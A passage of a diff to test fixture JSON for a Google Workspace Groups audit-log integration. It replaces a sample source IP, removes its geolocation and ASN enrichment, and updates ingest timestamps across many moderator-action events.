"country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -886,7 +706,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -910,8 +730,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728253900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"add_info_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"info_setting\",\"value\":\"custom_footer\"},{\"name\":\"value\",\"value\":\"footer\"}]}}", + "ingested": "2021-12-09T13:39:12.286072900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"add_info_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"info_setting\",\"value\":\"custom_footer\"},{\"name\":\"value\",\"value\":\"footer\"}]}}", "provider": "groups", "action": "add_info_setting", "id": "1", @@ -942,31 +762,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -980,7 +782,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1005,8 +807,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728255400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_info_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"info_setting\",\"value\":\"custom_footer\"},{\"name\":\"new_value\",\"value\":\"footer\"},{\"name\":\"old_value\",\"value\":\"old footer\"}]}}", + "ingested": "2021-12-09T13:39:12.286078200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_info_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"info_setting\",\"value\":\"custom_footer\"},{\"name\":\"new_value\",\"value\":\"footer\"},{\"name\":\"old_value\",\"value\":\"old footer\"}]}}", "provider": "groups", "action": "change_info_setting", "id": "1", @@ -1037,31 +839,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1075,7 +859,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1099,8 +883,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728257Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"remove_info_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"info_setting\",\"value\":\"custom_footer\"},{\"name\":\"value\",\"value\":\"footer\"}]}}", + "ingested": "2021-12-09T13:39:12.286083700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"remove_info_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"info_setting\",\"value\":\"custom_footer\"},{\"name\":\"value\",\"value\":\"footer\"}]}}", "provider": "groups", "action": "remove_info_setting", "id": "1", @@ -1131,31 +915,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1169,7 +935,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1194,8 +960,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728258500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_new_members_restrictions_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"new_members_restrictions_setting\",\"value\":\"new_members_can_post\"},{\"name\":\"new_value\",\"value\":\"inherit\"},{\"name\":\"old_value\",\"value\":\"overriden_to_false\"}]}}", + "ingested": "2021-12-09T13:39:12.286088900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_new_members_restrictions_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"new_members_restrictions_setting\",\"value\":\"new_members_can_post\"},{\"name\":\"new_value\",\"value\":\"inherit\"},{\"name\":\"old_value\",\"value\":\"overriden_to_false\"}]}}", "provider": "groups", "action": "change_new_members_restrictions_setting", "id": "1", @@ -1226,31 +992,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1264,7 +1012,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1289,8 +1037,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728259900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_post_replies_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"post_replies_setting\",\"value\":\"where_should_replies_be_sent\"},{\"name\":\"new_value\",\"value\":\"reply_to_custom_address\"},{\"name\":\"old_value\",\"value\":\"reply_to_author_only\"}]}}", + "ingested": "2021-12-09T13:39:12.286094100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_post_replies_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"post_replies_setting\",\"value\":\"where_should_replies_be_sent\"},{\"name\":\"new_value\",\"value\":\"reply_to_custom_address\"},{\"name\":\"old_value\",\"value\":\"reply_to_author_only\"}]}}", "provider": "groups", "action": "change_post_replies_setting", "id": "1", @@ -1321,31 +1069,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1359,7 +1089,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1384,8 +1114,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728261400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_spam_moderation_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"spam_moderation_setting\",\"value\":\"how_to_handle_suspected_spam_messages\"},{\"name\":\"new_value\",\"value\":\"moderate_and_do_not_send_notifications\"},{\"name\":\"old_value\",\"value\":\"moderate_and_send_notifications\"}]}}", + "ingested": "2021-12-09T13:39:12.286099400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_spam_moderation_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"spam_moderation_setting\",\"value\":\"how_to_handle_suspected_spam_messages\"},{\"name\":\"new_value\",\"value\":\"moderate_and_do_not_send_notifications\"},{\"name\":\"old_value\",\"value\":\"moderate_and_send_notifications\"}]}}", "provider": "groups", "action": "change_spam_moderation_setting", "id": "1", @@ -1416,31 +1146,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1454,7 +1166,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1479,8 +1191,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728263Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_topic_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"topic_setting\",\"value\":\"allowed_topic_types\"},{\"name\":\"new_value\",\"value\":\"discussions_questions\"},{\"name\":\"old_value\",\"value\":\"discussions\"}]}}", + "ingested": "2021-12-09T13:39:12.286104600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_topic_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"topic_setting\",\"value\":\"allowed_topic_types\"},{\"name\":\"new_value\",\"value\":\"discussions_questions\"},{\"name\":\"old_value\",\"value\":\"discussions\"}]}}", "provider": "groups", "action": "change_topic_setting", "id": "1", @@ -1511,31 +1223,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1549,7 +1243,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1576,8 +1270,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728264600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"moderate_message\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"message_moderation_action\",\"value\":\"approved\"},{\"name\":\"status\",\"value\":\"succeeded\"},{\"name\":\"message_id\",\"value\":\"message id\"}]}}", + "ingested": "2021-12-09T13:39:12.286109900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"moderate_message\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"message_moderation_action\",\"value\":\"approved\"},{\"name\":\"status\",\"value\":\"succeeded\"},{\"name\":\"message_id\",\"value\":\"message id\"}]}}", "provider": "groups", "action": "moderate_message", "id": "1", @@ -1607,31 +1301,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1646,7 +1322,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1672,8 +1348,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728266100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"always_post_from_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"},{\"name\":\"status\",\"value\":\"succeeded\"}]}}", + "ingested": "2021-12-09T13:39:12.286115200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"always_post_from_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"},{\"name\":\"status\",\"value\":\"succeeded\"}]}}", "provider": "groups", "action": "always_post_from_user", "id": "1", @@ -1706,31 +1382,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1745,7 +1403,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1771,8 +1429,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728267600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"add_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"},{\"name\":\"member_role\",\"value\":\"manager\"}]}}", + "ingested": "2021-12-09T13:39:12.286120500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"add_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"},{\"name\":\"member_role\",\"value\":\"manager\"}]}}", "provider": "groups", "action": "add_user", "id": "1", @@ -1806,31 +1464,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1845,7 +1485,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1871,8 +1511,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728269100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"ban_user_with_moderation\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"},{\"name\":\"member_role\",\"value\":\"manager\"}]}}", + "ingested": "2021-12-09T13:39:12.286125700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"ban_user_with_moderation\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"},{\"name\":\"member_role\",\"value\":\"manager\"}]}}", "provider": "groups", "action": "ban_user_with_moderation", "id": "1", @@ -1906,31 +1546,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1945,7 +1567,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1970,8 +1592,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728270500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"revoke_invitation\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:39:12.286130900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"revoke_invitation\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", "provider": "groups", "action": "revoke_invitation", "id": "1", @@ -2005,31 +1627,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2044,7 +1648,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2069,8 +1673,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728272Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"invite_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:39:12.286136200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"invite_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", "provider": "groups", "action": "invite_user", "id": "1", @@ -2104,31 +1708,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2143,7 +1729,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2168,8 +1754,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728273500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"reject_join_request\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:39:12.286141400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"reject_join_request\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", "provider": "groups", "action": "reject_join_request", "id": "1", @@ -2203,31 +1789,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", 